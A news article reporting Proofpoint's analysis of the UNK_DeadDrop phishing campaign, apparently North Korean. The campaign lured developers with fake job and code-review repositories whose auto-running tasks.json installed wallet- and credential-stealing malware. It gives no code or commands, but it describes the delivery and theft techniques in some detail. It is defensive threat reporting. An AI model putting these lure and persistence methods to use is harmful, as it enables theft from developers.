A recent analysis by cybersecurity firm Proofpoint has revealed a significant phishing campaign believed to be linked to North Korean threat actors, targeting software developers across nearly 100 organizations. This campaign, identified as UNK_DeadDrop, utilized deceptive tactics involving fake job opportunities and requests for code reviews to steal sensitive cryptocurrency information and personal credentials.
In April and May 2026, more than 250 phishing emails were dispatched, primarily aimed at individuals in the United States, working within sectors such as technology, education, and finance—with a notable concentration on cryptocurrency firms. The malicious emails typically contained links to GitHub or GitLab repositories, disguised as coding assignments. Recipients were instructed to clone these repositories and open the contents using code editors like VS Code or Cursor, leading them into a trap designed to compromise their security.
The pretexts of these phishing attempts varied week to week. They included enticing job offers for roles such as full-stack developers and “agent lead” positions, requests for peer reviews of open-source code, and tasks designed to test ERC-4626 smart-contract vaults. Additionally, there were projects that involved developing AI-driven payment agents. This shifting array of pretenses reflects the attackers’ strategies to remain adaptable and relevant to potential victims, making the lures seem realistic and appealing.
Inside each crafted repository, a hidden file named tasks.json was programmed to execute automatically when the folder was opened. This technique exploits a legitimate feature of code editors. In the case of VS Code, at least one security measure was in place where users would see a trust prompt. However, the Cursor editor lacked any such prompt, allowing the malicious payload to run without user interaction, significantly increasing the risk of infection.
The malware deployed as part of this campaign has different functionalities depending on the operating system of the victim. For macOS and Linux users, the script installs a nefarious VS Code extension masquerading as a legitimate Google service, ensuring the malware reactivates any time the editor is reopened. In contrast, the version targeting Windows is concealed within JavaScript, running directly inside the editor without leaving any noticeable files on the disk, further complicating detection efforts.
Regardless of the platform, the ultimate goal of the malware remains consistent: to extract cryptocurrency and sensitive credentials from unsuspecting victims. The malware scans for browser data and various cryptocurrency wallet applications, targeting both browser-based wallet extensions, such as MetaMask, Phantom, and Keplr, as well as desktop wallet applications like Exodus, Electrum, and Ledger Live. Additionally, it seeks to gather saved passwords and cookies from popular web browsers, including Chrome, Brave, Edge, and Firefox.
In an alarming twist, the macOS and Linux versions of the malware employ a counterfeit password dialog to capture user credentials. Subsequently, they exploit these captured passwords to elevate permissions and access the system’s keychain or keyring, where sensitive information is stored. Conversely, the Windows variant circumvents Chrome’s app-bound encryption to extract secured data. After successfully exfiltrating information, the malware erases its presence to erase any evidence of the attack.
Proofpoint indicated that they observed similarities between this current campaign and the notorious Contagious Interview, a long-running North Korean operation that exploits developers through fake recruitment schemes. However, they are tracking the UNK_DeadDrop campaign as a distinct threat due to its unique methods, such as email-led delivery, the extensive scale of repository creation, and a self-sustaining payload that retains functionality even after infrastructure disruptions.
While Proofpoint has yet to definitively attribute the activities to a known actor, they continue to monitor this ongoing threat as a separate entity. North Korean-affiliated groups have reportedly targeted developers using such strategies since at least 2022, leveraging deceptive recruiter profiles and compromised development tools in their attempts to infiltrate sensitive systems and networks. This evolving narrative emphasizes the persistent and evolving nature of cyber threats, particularly those stemming from state-sponsored actors, and underscores the necessity for heightened awareness and defense mechanisms within the tech community.